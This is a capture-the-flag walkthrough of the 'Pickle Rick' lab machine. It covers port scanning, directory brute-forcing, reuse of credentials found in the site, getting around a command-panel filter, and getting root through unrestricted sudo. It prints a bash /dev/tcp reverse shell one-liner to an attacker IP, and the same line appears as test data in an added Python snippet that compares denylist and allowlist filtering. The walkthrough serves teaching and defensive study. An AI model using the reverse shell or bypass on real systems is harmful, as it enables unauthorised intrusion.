Pickle Rick

Last updated 3 years ago

Reconnaissance

Let's start with an initial nmap scan to find open ports.

nmap -Pn 10.10.249.44

Detailed Nmap Scan:

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving the output to a file called nmap

nmap -sC -sV -p 22,80 -oN nmap 10.10.249.44

Enumerate

Port 80

Let's visit the website and look at the source code.

Let's add this to our notes. I personally use gedit on the Kali virtual machine and then transfer all of it to "OneNote" on my host machine and organize it. To use gedit: gedit <name of file>

gedit notes

Now let's visit robots.txt. We usually find something interesting on this page, like hidden directories or sometimes even passwords.

This looks interesting. It could be a directory, but I tested it and it was not, so it could be a password; let's save it in our notes.

Now let's run Gobuster to see if we can find hidden directories.

Command Breakdown:

  • (-w): Specifying wordlist

  • (-u): Specifying URL

  • (-x): Specifying extensions

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.249.44 -x txt,php,html

/login.php and /portal.php were the same page, as /portal.php redirects us to /login.php.

/assets had some JavaScript and CSS files which did not look like they were going to help us exploit this machine.

Now we have found ourselves a login page.

And if we look at our notes, we have a username and a possible password. Let's try using them to log in.

And we got in!!

We have a command panel where we can run some commands. Let's explore it.

Running ls gives us some files present in the current directory.

Let's try reading those files.

cat Sup3rS3cretPickl3Ingred.txt

And... the command is disabled. So what can we do here? If we try different commands we can see that many commands are allowed, but cat is not. After a lot of searching I found a command that gave us a reverse shell on the server.

bash -c 'exec bash -i &>/dev/tcp/10.13.8.64/1234 <&1'
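The panel's filter is the real lesson here: it refuses cat by name but lets bash -c through, so blocking one command by name buys nothing. The added example below (my own code, not the machine's panel code, which is not on the page) models that denylist behaviour beside an allowlist filter and runs both over the three command lines used above; the set of allowed commands is an assumption.

```python
import shlex

# Command lines typed into the panel on this page (the third one is the bypass).
PANEL_INPUTS = [
    "ls",
    "cat Sup3rS3cretPickl3Ingred.txt",
    "bash -c 'exec bash -i &>/dev/tcp/10.13.8.64/1234 <&1'",
]

# Weak filter: reject a command only when its first word is on a denylist.
# This models the behaviour the panel shows; the panel's real code is not on the page.
DENYLIST = {"cat"}

def denylist_allows(cmdline: str) -> bool:
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: refuse rather than guess
        return False
    return bool(argv) and argv[0] not in DENYLIST

# Hardened filter: accept only a fixed, argument-free allowlist (assumed set) and
# refuse any input containing shell metacharacters, so no interpreter, redirection
# or /dev/tcp trick can be reached through the panel at all.
ALLOWLIST = {"ls", "pwd", "whoami"}
METACHARS = set("&|;<>$`()\\\"'\n")

def allowlist_allows(cmdline: str) -> bool:
    if any(ch in METACHARS for ch in cmdline):
        return False
    argv = cmdline.split()
    return len(argv) == 1 and argv[0] in ALLOWLIST

def evaluate(inputs=PANEL_INPUTS):
    """Map each command line to (denylist verdict, allowlist verdict)."""
    return {cmd: (denylist_allows(cmd), allowlist_allows(cmd)) for cmd in inputs}

if __name__ == "__main__":
    for cmd, (deny_ok, allow_ok) in evaluate().items():
        verdict = lambda ok: "allow" if ok else "block"
        print(f"{cmd!r}: denylist={verdict(deny_ok)} allowlist={verdict(allow_ok)}")
```

The denylist blocks only the literal cat line and waves the bash -c line through; the allowlist blocks both and still permits ls.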

And now we can read the contents of Sup3rS3cretPickl3Ingred.txt.

cat Sup3rS3cretPickl3Ingred.txt

This is the answer to the first question.

Now let's enumerate the machine and find a way to get root.

Privilege Escalation

While looking around I found the second ingredient which is the second answer.

Now let's try to become root so we can cd into the root directory, as I think the final ingredient is hidden there. Let's run the command sudo -l to see if we can run files as other users.

sudo -l

We are allowed to run ALL, so let's try switching users to root using the command su.

sudo su

And we are root! We can also see the 3rd and final ingredient in the root directory.